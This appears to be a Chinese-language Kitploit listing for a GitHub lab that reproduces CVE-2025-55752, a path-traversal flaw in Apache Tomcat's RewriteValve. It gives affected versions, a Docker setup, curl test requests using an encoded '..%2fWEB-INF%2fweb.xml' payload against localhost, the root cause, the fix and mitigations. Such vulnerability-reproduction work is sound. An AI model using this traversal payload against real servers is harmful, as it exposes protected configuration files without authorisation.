Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55752 — 基于 Docker 的 CVE-2025-55752 复现环境,该漏洞是 Apache Tomcat 的 RewriteValve 中的路径遍历漏洞,演示了先规范化后解码的缺陷,并提供测试命令。 | Kitploit
工具/GitHubGitHub/masahiro331/cve-2025-55752
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubmasahiro331/cve-2025-55752

CVE-2025-55752

基于 Docker 的 CVE-2025-55752 复现环境,该漏洞是 Apache Tomcat 的 RewriteValve 中的路径遍历漏洞,演示了先规范化后解码的缺陷,并提供测试命令。

查看仓库
14310个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55752:Apache Tomcat 路径遍历漏洞

基于 Docker 的 CVE-2025-55752 复现环境,该漏洞是 Apache Tomcat 10.1.44 中的一个路径遍历漏洞。

概述

CVE-2025-55752 是 Apache Tomcat RewriteValve 中的一个路径遍历漏洞,由错误的处理顺序引起:URL 规范化发生在 URL 解码之前。这允许攻击者使用 URL 编码的路径遍历序列(..%2f)绕过对 /WEB-INF/ 等目录的安全限制。

漏洞特征

  • CVE ID:CVE-2025-55752
  • CVSS v3.1:7.5(高危)
  • CWE:CWE-22(路径遍历)
  • 组件:Apache Tomcat RewriteValve
  • 根本原因:先规范化后解码的处理顺序

受影响版本

系列受影响版本已修复版本
11.x11.0.0-M1 至 11.0.1011.0.11+
10.1.x10.1.0-M1 至 10.1.4410.1.45+
9.0.x9.0.0-M11 至 9.0.1089.0.109+
8.5.x8.5.6 至 8.5.100已停止维护 - 无补丁

快速开始

root@kitploit:~
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/

漏洞测试

测试 1:直接访问 WEB-INF(受保护)

root@kitploit:~
curl -I 'http://localhost:8080/WEB-INF/web.xml'

预期结果:403 Forbidden

测试 2:信息泄露(读取受保护文件)

root@kitploit:~
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'

预期结果:200 OK + web.xml 内容(漏洞已确认)

工作原理

  1. 请求:/download?path=..%2fWEB-INF%2fweb.xml
  2. RewriteValve 重写为:/files/..%2fWEB-INF%2fweb.xml
  3. URL 规范化(解码前):%2f 未被识别为 /,.. 得以保留
  4. URL 解码:%2f → / → /files/../WEB-INF/web.xml
  5. 路径解析:/WEB-INF/web.xml

处理顺序问题

root@kitploit:~
正确:    解码 → 规范化 → 安全检查
存在漏洞:规范化 → 解码 → 安全检查 ✗

Tomcat 修复

  • GitHub:apache/tomcat commit 130d36d8
  • 修复方案:先解码后规范化

缓解措施

  1. 如非必要,禁用 RewriteValve
  2. 禁用 PUT 方法
  3. 配置 WAF 规则以阻止 ../ 和 %2e%2e
  4. 升级到已修复版本(10.1.45+、9.0.109+、11.0.11+)

参考资料

  • Apache Tomcat 安全公告
  • NVD - CVE-2025-55752
  • OWASP 路径遍历
  • CWE-22:路径名限制不当

免责声明

⚠️ 警告:请勿部署到生产环境。仅在隔离的测试环境中使用。

下载工具